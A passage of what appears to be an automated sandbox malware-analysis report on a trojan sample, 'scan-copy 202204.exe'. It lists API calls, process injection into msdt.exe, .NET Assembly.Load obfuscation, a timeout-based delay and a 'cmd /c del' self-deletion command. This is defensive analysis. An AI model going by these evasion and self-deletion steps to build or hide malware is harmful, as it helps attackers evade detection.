            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4D5E0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E025DD
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D62581
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E01D55
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E02D07
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D30D20
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E02EF7
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DFD616
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D56E30
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E01FF1
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E028EC
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4B090
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E020A8
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D620A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF1002
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3F900
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D54120
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E022AE
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DFDBD2
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6EBB0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E02B28
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00ACC097
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00ACB8D6
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00ACC976
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AB8C8C
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AB8C90
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AB2D87
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AB2D90
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AB2FB0
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: String function: 0132B150 appears 35 times
            Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04D3B150 appears 35 times
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_004185F0 NtCreateFile,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_004186A0 NtReadFile,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00418720 NtClose,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_004187D0 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041869A NtReadFile,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041871A NtClose,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013699A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013698F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013695D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013697A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013696E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013699D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0136B040 NtSuspendThread,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013698A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0136A3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369A10 NtQuerySection,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0136AD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369560 NtWriteFile,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013695F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0136A710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0136A770 NtOpenThread,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369760 NtOpenProcess,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369670 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_01369650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_013696D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D795D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D796D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D796E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D799A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D795F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79560 NtWriteFile,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D797A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D798F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D798A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D799D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D79B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AC85F0 NtCreateFile,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AC86A0 NtReadFile,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AC87D0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AC8720 NtClose,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AC869A NtReadFile,
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AC871A NtClose,
            Source: scan-copy 202204.exeStatic PE information: Resource name: RT_VERSION type: ARC archive data, packed
            Source: scan-copy 202204.exe, 00000000.00000002.354024291.00000000082F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBinsyn.dll" vs scan-copy 202204.exe
            Source: scan-copy 202204.exe, 00000000.00000002.348579760.0000000000CC6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUsevbg.exe0 vs scan-copy 202204.exe
            Source: scan-copy 202204.exe, 00000000.00000002.349136480.0000000001460000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs scan-copy 202204.exe
            Source: scan-copy 202204.exe, 00000000.00000003.343858916.00000000042D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBinsyn.dll" vs scan-copy 202204.exe
            Source: scan-copy 202204.exe, 00000000.00000003.344178093.0000000004610000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBinsyn.dll" vs scan-copy 202204.exe
            Source: scan-copy 202204.exe, 00000000.00000002.349788764.0000000003141000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs scan-copy 202204.exe
            Source: scan-copy 202204.exe, 0000000F.00000002.420861386.00000000015AF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs scan-copy 202204.exe
            Source: scan-copy 202204.exe, 0000000F.00000002.418044910.0000000000866000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUsevbg.exe0 vs scan-copy 202204.exe
            Source: scan-copy 202204.exe, 0000000F.00000002.420091467.000000000141F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs scan-copy 202204.exe
            Source: scan-copy 202204.exe, 0000000F.00000002.421704804.00000000031C0000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs scan-copy 202204.exe
            Source: scan-copy 202204.exeBinary or memory string: OriginalFilenameUsevbg.exe0 vs scan-copy 202204.exe
            Source: scan-copy 202204.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: scan-copy 202204.exeVirustotal: Detection: 30%
            Source: scan-copy 202204.exeReversingLabs: Detection: 14%
            Source: scan-copy 202204.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\scan-copy 202204.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\scan-copy 202204.exe "C:\Users\user\Desktop\scan-copy 202204.exe"
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess created: C:\Users\user\Desktop\scan-copy 202204.exe C:\Users\user\Desktop\scan-copy 202204.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
            Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\scan-copy 202204.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess created: C:\Users\user\Desktop\scan-copy 202204.exe C:\Users\user\Desktop\scan-copy 202204.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
            Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\scan-copy 202204.exe"
            Source: C:\Users\user\Desktop\scan-copy 202204.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\scan-copy 202204.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@12/1@4/2
            Source: C:\Users\user\Desktop\scan-copy 202204.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\scan-copy 202204.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:992:120:WilError_01
            Source: C:\Users\user\Desktop\scan-copy 202204.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\scan-copy 202204.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\scan-copy 202204.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: scan-copy 202204.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: scan-copy 202204.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: scan-copy 202204.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: msdt.pdbGCTL source: scan-copy 202204.exe, 0000000F.00000002.421704804.00000000031C0000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: scan-copy 202204.exe, 0000000F.00000002.420091467.000000000141F000.00000040.00000800.00020000.00000000.sdmp, scan-copy 202204.exe, 0000000F.00000002.418886183.0000000001300000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000012.00000002.525919808.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000012.00000002.527450554.0000000004E2F000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: scan-copy 202204.exe, scan-copy 202204.exe, 0000000F.00000002.420091467.000000000141F000.00000040.00000800.00020000.00000000.sdmp, scan-copy 202204.exe, 0000000F.00000002.418886183.0000000001300000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000012.00000002.525919808.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000012.00000002.527450554.0000000004E2F000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: msdt.pdb source: scan-copy 202204.exe, 0000000F.00000002.421704804.00000000031C0000.00000040.10000000.00040000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: scan-copy 202204.exe, Form4.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.scan-copy 202204.exe.cc0000.0.unpack, Form4.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.scan-copy 202204.exe.cc0000.0.unpack, Form4.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 15.0.scan-copy 202204.exe.860000.0.unpack, Form4.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 15.0.scan-copy 202204.exe.860000.5.unpack, Form4.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 15.0.scan-copy 202204.exe.860000.2.unpack, Form4.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 15.0.scan-copy 202204.exe.860000.3.unpack, Form4.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 15.2.scan-copy 202204.exe.860000.1.unpack, Form4.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 15.0.scan-copy 202204.exe.860000.1.unpack, Form4.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 15.0.scan-copy 202204.exe.860000.7.unpack, Form4.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 15.0.scan-copy 202204.exe.860000.9.unpack, Form4.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00415823 push ebp; iretd
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041B832 push eax; ret
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041B83B push eax; ret
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041B89C push eax; ret
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_004160B6 push esi; iretd
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0040A15B push esi; ret
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00416119 push esi; iretd
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00416119 pushad ; iretd
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00418186 push ebx; iretd
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0040F3A1 push dword ptr [ecx+6Bh]; ret
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00415CE4 push ebp; ret
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041AF71 push edi; retf
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0041B7E5 push eax; ret
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_0137D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D8D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AC60B6 push esi; iretd
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00ACB89C push eax; ret
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AC5823 push ebp; iretd
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00ACB83B push eax; ret
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00ACB832 push eax; ret
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AC8186 push ebx; iretd
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AC6119 push esi; iretd
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AC6119 pushad ; iretd
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00ABA15B push esi; ret
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00ABF3A1 push dword ptr [ecx+6Bh]; ret
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00AC5CE4 push ebp; ret
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00ACB7E5 push eax; ret
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_00ACAF71 push edi; retf
            Source: scan-copy 202204.exeStatic PE information: 0xF64312B7 [Sat Dec 4 08:07:19 2100 UTC]

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (92).png
            Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\scan-copy 202204.exe"
            Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\scan-copy 202204.exe"
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
